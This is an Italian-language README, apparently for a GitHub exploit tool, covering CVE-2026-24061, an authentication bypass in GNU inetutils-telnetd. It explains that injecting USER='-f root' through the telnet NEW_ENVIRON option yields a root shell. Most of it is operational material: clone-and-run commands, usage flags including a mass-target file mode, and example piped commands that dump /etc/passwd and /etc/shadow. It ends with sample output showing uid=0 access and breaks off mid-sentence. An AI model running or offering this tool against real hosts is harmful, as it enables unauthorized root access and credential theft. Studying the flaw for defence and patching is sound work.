
Prova di concetto: CVE-2026-24061 è una vulnerabilità critica di bypass dell'autenticazione in GNU inetutils-telnetd che consente a remoti aggressori non autenticati di ottenere immediatamente l'accesso a una shell di root tramite lo sfruttamento dannoso dell'opzione telnet NEW_ENVIRON.
Uno strumento di ricerca sulla sicurezza per lo sfruttamento di CVE-2026-24061, una vulnerabilità critica di bypass dell'autenticazione remota in GNU inetutils-telnetd che consente l'accesso immediato a una shell di root senza autenticazione.
| Campo | Valore |
|---|---|
| Identificatore CVE | CVE-2026-24061 |
| Punteggio CVSS v3.1 | 9.8 (Critico) |
| Vettore CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Classificazione CWE | CWE-88: Neutralizzazione impropria dei delimitatori di argomenti in un comando |
| Fornitore | GNU Project |
| Prodotto | inetutils-telnetd |
| Data di divulgazione | 20 gennaio 2026 |
| Patch disponibile | Da determinare (TBD) |
Esiste una vulnerabilità critica in GNU inetutils-telnetd fino alla versione 2.7 che consente a utenti remoti non autenticati di bypassare completamente l'autenticazione e ottenere immediato accesso a una shell di root. La vulnerabilità viene sfruttata tramite l'opzione telnet NEW_ENVIRON iniettando una variabile d'ambiente USER appositamente predisposta con il valore "-f root", che aggira tutti i meccanismi di autenticazione.
| Intervallo di versioni | Stato |
|---|---|
| <= 2.7 | Vulnerabile |
| > 2.7 | Stato della patch da determinare |
La vulnerabilità ha origine dalla convalida impropria della variabile d'ambiente USER nel gestore dell'opzione NEW_ENVIRON di telnetd. Durante l'elaborazione dell'opzione telnet NEW_ENVIRON, il servizio telnetd non riesce a sanificare il valore della variabile USER prima di passarlo al processo di login. Impostando USER su "-f root", l'attaccante inietta argomenti da riga di comando che forzano il successo dell'autenticazione per l'utente root senza richiedere credenziali.
Tutte le dipendenze fanno parte della libreria standard di Python:
| Pacchetto | Scopo |
|---|---|
| socket | Comunicazione di rete |
| select | Multiplexing I/O |
| sys | Interazione con il sistema |
| os | Interfaccia del sistema operativo |
| threading | Sfruttamento concorrente dei target |
| datetime | Formattazione dei timestamp |
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061
# Run the exploit
python3 main.py -u <target_ip>
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py
# Make it executable (Linux/macOS)
chmod +x main.py
# Run the exploit
python3 main.py -u <target_ip>
# Ensure Python 3.7+ is installed
python3 --version
# Download and run
python3 main.py -u <target_ip>
Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u Single target IP address or hostname
-l Path to file containing target IPs (one per line)
-p Target port (default: 23)
-usr User to exploit as (default: root)
Sfrutta una singola istanza telnetd:
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100
# Custom port
python3 main.py -u 192.168.1.100 -p 2323
# Different user
python3 main.py -u 192.168.1.100 -usr admin
Esegui comandi in modalità non interattiva:
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
Sfrutta più target da un file:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
Formato del file dei target (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
Note:
| Indicatore | Colore | Descrizione |
|---|---|---|
[SUCCESS] | Verde | Connessione al target riuscita |
[EXPLOIT] | Verde | Payload di sfruttamento inviato correttamente |
[INFO] | Blu | Messaggio informativo sull'operazione corrente |
[ERROR] | Rosso | Errore di connessione, timeout o errore di sfruttamento |
[WARNING] | Giallo | Messaggio di avviso (attualmente non utilizzato) |
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
Lo strumento sfrutta la fase di negoziazione del protocollo telnet: